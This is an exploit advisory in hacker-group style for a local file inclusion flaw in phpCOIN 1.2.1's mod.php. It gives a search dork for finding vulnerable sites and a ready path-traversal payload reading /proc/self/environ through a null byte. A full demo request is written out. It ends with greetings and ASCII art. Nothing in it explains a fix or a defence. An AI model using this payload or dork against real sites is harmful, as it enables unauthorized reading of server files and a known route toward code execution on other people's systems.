# Exploit Title: phpCOIN 1.2.1 (mod.php) LFI vulnerability # Author: _mlk_ # Software Link: null # Version: phpCOIN 1.2.1 # Tested on: Linux*,*BSD and *windows # Code : on paper phpCOIN 1.2.1 (mod.php) Local File Inclusion Vulnerability ############################################################################################################# # # # [+] Discovered by : _mlk_ # # # # [+] Teams : c00kies , BugSec , BotecoUnix & c0d3rs # # # # [+] Sites : http://code.google.com/p/bugsec/ # # http://botecounix.com.br/blog/ # # http://c0d3rs.wordpress.com/ # # # ############################################################################################################# # # # [-] Information # # # # [+] Script : phpCOIN 1.2.1 # # # # [+] Language : PHP # # # # [+] Vendor : http://www.phpcoin.com/ # # # # [+] Dork/String : "Powered By phpCOIN v1.2.1" / "mod.php?mod=faq" # # # # [+] Date : 02/03/10 (Brazil) # # # ############################################################################################################# # # # [*] Example : # # # # http://localhost/[PATH]/mod.php?mod=[LFI]%00# # http://localhost/mod.php?mod=[LFI]%00# # # # # # --------------------------------------------------------------------------------------- # # # # # # [*] Exploit : # # # # /../../../../../../proc/self/environ%00 # # /proc/self/environ%00 # # # # # # --------------------------------------------------------------------------------------- # # # # # # [*] Demo : # # # # http://server/phpcoin/mod.php?mod=/../../../../../../proc/self/environ%00 # # # # # ############################################################################################################# # # # _\|/_ Greetz : # # # # Cooler_ , m0nad , i4k , F10N4 , dr4k3 , m1cr0n , l4rt , sh0rtkiller , hox , d4m4g3 , M0nt3r , # # and all my friends emos ... xD # # # ############################################################################################################# ,, ,, ((((( ))))) (((((( )))))) (((((( Overflow )))))) (((((,e@@@@@@@@@@e,))))) (((@@@@@@@@@@@@@@@@))) BUGSEC TEAM \@@/,:::,\/,:::,\@@/ /@@@|:::::||:::::|@@@\ / @@@\':::'/\':::'/@@@ \ / /@@@@@@@//\\@@@@@@@\ \ ( / '@@@@@@@@@@@@@@' \ ) \( / \ )/ \ ( ) / ('-.)' [Ruby](`'.) ' \ / ('-.)' (`'.)[ASM] '('-.)' . ' . ('-.)' (`'.) '('-.)' (`'.) ' ' .( '.) '[Flex+bison]('-.)' (`'.) '('-.)' (`'.) ' _ ('-.)' (`'.) '('-.)' (`'.) '('-.)'[Emacs] (`'.) (`'.) '' |0|=======- -(. ')`[VIM]( .-`)(`'.) ',(-')'('-.)' (`'.) (`'.) ' .--`+'--. . (' -,).(') .('-.)' (`'.) '('-.)' (`'.)(`'.) [Python]' ' |`-----'| (' .) - ('. )[Perl]('-.)' (`'.) '('-.)' (`'.) '(`'.) ' | | . ('[PHP] `. )('-.)' (`'.)[REGEX] '('-.)' (`'.) ' | === | ` . `('-.)'[C/C++] (`'.) ('-.)' (`'.) '' |BugSec | ('-.)' (`'.) '('-.)[AWK]' (`'.) ' | --- | | | Art by Cooler_ | GDB | | | `-.___.-'